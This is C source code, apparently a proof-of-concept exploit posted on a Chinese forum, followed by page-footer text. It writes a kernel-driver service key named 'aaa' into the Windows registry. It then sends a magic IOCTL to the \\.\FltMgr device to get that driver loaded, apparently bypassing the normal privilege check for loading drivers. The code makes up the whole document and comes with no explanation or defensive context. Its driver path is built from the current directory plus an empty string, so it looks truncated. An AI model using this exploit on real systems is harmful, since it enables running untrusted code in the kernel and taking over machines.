#include<stdio.h>
#include<windows.h>
typedef struct _tagLOAD
{
WORD Len;
WCHAR ServiceName[512];
} LOAD , *PLOAD;
#define MAGIC_IOCTL 0x00088004
VOID WINAPI make_reg( LPWSTR szDriverName, LPWSTR szDriverPath )
{
DWORD dwType = SERVICE_KERNEL_DRIVER;
DWORD dwStart = SERVICE_DEMAND_START;
HKEY hKey;
WCHAR szMain[512] = {0};
WCHAR szImgPath[512] = {0};
wchar_t szRegPath[512]={0};
wsprintfW( szMain,
L"%s%s",
L"SYSTEM\\CurrentControlSet\\Services\\",
szDriverName );
wsprintfW( szImgPath,
L"%s%s",
L"",
szDriverPath);
if( RegCreateKeyW( HKEY_LOCAL_MACHINE, szMain, &hKey ) == ERROR_SUCCESS )
{
RegSetValueExW( hKey,
L"DisplayName",
0,
REG_SZ,
(LPBYTE)szDriverName,
(DWORD)lstrlenW(szDriverName)*2);
RegSetValueExW( hKey,
L"ImagePath",
0,
REG_EXPAND_SZ,
(LPBYTE)szImgPath,
(DWORD)lstrlenW(szImgPath)*2);
RegSetValueExW( hKey,
L"Type",
0,
REG_DWORD,
(LPBYTE)&dwType,
(DWORD)sizeof(dwType) );
RegSetValueExW( hKey,
L"Start",
0,
REG_DWORD,
(LPBYTE)&dwStart,
(DWORD)sizeof(dwStart) );
}
}
int main( int argc , char *argv[] )
{
HANDLE hDevice;
LOAD service_to_load;
BOOL err;
DWORD dwRet=0;
WCHAR drvPath[512];
memset( drvPath , 0 , 512 );
GetCurrentDirectoryW( MAX_PATH , drvPath );
lstrcatW( drvPath , L"" );
make_reg( L"aaa" , drvPath );
hDevice = CreateFile ("\\\\.\\FltMgr" , GENERIC_READ | GENERIC_WRITE , FILE_SHARE_READ | FILE_SHARE_WRITE , NULL , OPEN_EXISTING , FILE_ATTRIBUTE_NORMAL , NULL );
if( hDevice == INVALID_HANDLE_VALUE )
{
printf("CreateFile failed with status : %d\n" , GetLastError() );
goto __end;
}
wcscpy( service_to_load.ServiceName , L"aaa");
service_to_load.Len = wcslen( service_to_load.ServiceName )*sizeof(WCHAR);
err = DeviceIoControl( hDevice , MAGIC_IOCTL , &service_to_load , sizeof(service_to_load) , NULL , 0 , &dwRet , NULL );
if( !err )
{
printf("sorry\n");
goto __end;
}
printf(":)\n");
__end:
CloseHandle( hDevice );
return 0;
}
扫一扫
4796
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
